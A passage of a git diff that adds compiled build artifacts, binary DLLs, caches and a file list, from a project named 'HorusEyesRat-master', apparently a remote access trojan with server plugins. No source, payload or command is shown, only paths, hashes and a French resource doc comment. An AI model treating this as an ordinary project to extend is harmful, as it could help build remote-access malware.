0000000..d9fe526 Binary files /dev/null and b/WB/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed differ diff --git a/WB/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed b/WB/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed new file mode 100644 index 0000000..60cb1ab Binary files /dev/null and b/WB/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed differ diff --git a/WB/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed b/WB/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..650889f Binary files /dev/null and b/WB/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed differ diff --git a/WB/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache b/WB/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache new file mode 100644 index 0000000..9749c99 Binary files /dev/null and b/WB/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/WB/obj/Release/PL.Resources.resources b/WB/obj/Release/PL.Resources.resources new file mode 100644 index 0000000..6c05a97 Binary files /dev/null and b/WB/obj/Release/PL.Resources.resources differ diff --git a/WB/obj/Release/TempPE/My Project.Application.Designer.vb.dll b/WB/obj/Release/TempPE/My Project.Application.Designer.vb.dll new file mode 100644 index 0000000..d2532b4 Binary files /dev/null and b/WB/obj/Release/TempPE/My Project.Application.Designer.vb.dll differ diff --git a/WB/obj/Release/TempPE/My Project.Resources.Designer.vb.dll b/WB/obj/Release/TempPE/My Project.Resources.Designer.vb.dll new file mode 100644 index 0000000..dbecaf7 Binary files /dev/null and b/WB/obj/Release/TempPE/My Project.Resources.Designer.vb.dll differ diff --git a/WB/obj/Release/WB.dll b/WB/obj/Release/WB.dll new file mode 100644 index 0000000..7bc9067 Binary files /dev/null and b/WB/obj/Release/WB.dll differ diff --git a/WB/obj/Release/WB.pdb b/WB/obj/Release/WB.pdb new file mode 100644 index 0000000..d66d97c Binary files /dev/null and b/WB/obj/Release/WB.pdb differ diff --git a/WB/obj/Release/WB.vbproj.CopyComplete b/WB/obj/Release/WB.vbproj.CopyComplete new file mode 100644 index 0000000..e69de29 diff --git a/WB/obj/Release/WB.vbproj.CoreCompileInputs.cache b/WB/obj/Release/WB.vbproj.CoreCompileInputs.cache new file mode 100644 index 0000000..15c13c2 --- /dev/null +++ b/WB/obj/Release/WB.vbproj.CoreCompileInputs.cache @@ -0,0 +1 @@ +660e3872eb3d0efffce2f059955f121dbd3974b8 diff --git a/WB/obj/Release/WB.vbproj.FileListAbsolute.txt b/WB/obj/Release/WB.vbproj.FileListAbsolute.txt new file mode 100644 index 0000000..e57d985 --- /dev/null +++ b/WB/obj/Release/WB.vbproj.FileListAbsolute.txt @@ -0,0 +1,16 @@ +Z:\HorusEyesRat-master\WB\bin\Release\WB.dll +Z:\HorusEyesRat-master\WB\bin\Release\WB.pdb +Z:\HorusEyesRat-master\WB\bin\Release\WB.xml +Z:\HorusEyesRat-master\WB\bin\Release\PacketLib.xml +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\WB.dll +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\WB.pdb +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\WB.xml +Z:\HorusEyesRat-master\WB\obj\Release\PL.Resources.resources +Z:\HorusEyesRat-master\WB\obj\Release\WB.vbproj.GenerateResource.cache +Z:\HorusEyesRat-master\WB\obj\Release\WB.vbproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\WB\obj\Release\WB.vbproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\WB\obj\Release\WB.vbproj.CopyComplete +Z:\HorusEyesRat-master\WB\obj\Release\WB.dll +Z:\HorusEyesRat-master\WB\obj\Release\WB.xml +Z:\HorusEyesRat-master\WB\obj\Release\WB.pdb +Z:\HorusEyesRat-master\WB\obj\Release\WB.vbprojAssemblyReference.cache diff --git a/WB/obj/Release/WB.vbproj.Fody.CopyLocal.cache b/WB/obj/Release/WB.vbproj.Fody.CopyLocal.cache new file mode 100644 index 0000000..c1cd591 --- /dev/null +++ b/WB/obj/Release/WB.vbproj.Fody.CopyLocal.cache @@ -0,0 +1 @@ +Z:\HorusEyesRat-master\PacketLib\bin\Debug\PacketLib.xml diff --git a/WB/obj/Release/WB.vbproj.GenerateResource.cache b/WB/obj/Release/WB.vbproj.GenerateResource.cache new file mode 100644 index 0000000..c9ae5e6 Binary files /dev/null and b/WB/obj/Release/WB.vbproj.GenerateResource.cache differ diff --git a/WB/obj/Release/WB.vbprojAssemblyReference.cache b/WB/obj/Release/WB.vbprojAssemblyReference.cache new file mode 100644 index 0000000..0825ede Binary files /dev/null and b/WB/obj/Release/WB.vbprojAssemblyReference.cache differ diff --git a/WB/obj/Release/WB.xml b/WB/obj/Release/WB.xml new file mode 100644 index 0000000..94de319 --- /dev/null +++ b/WB/obj/Release/WB.xml @@ -0,0 +1,26 @@ + + + + +WB + + + + + + Une classe de ressource fortement typée destinée, entre autres, à la consultation des chaînes localisées. + + + + + Retourne l'instance ResourceManager mise en cache utilisée par cette classe. + + + + + Remplace la propriété CurrentUICulture du thread actuel pour toutes + les recherches de ressources à l'aide de cette classe de ressource fortement typée. + + + +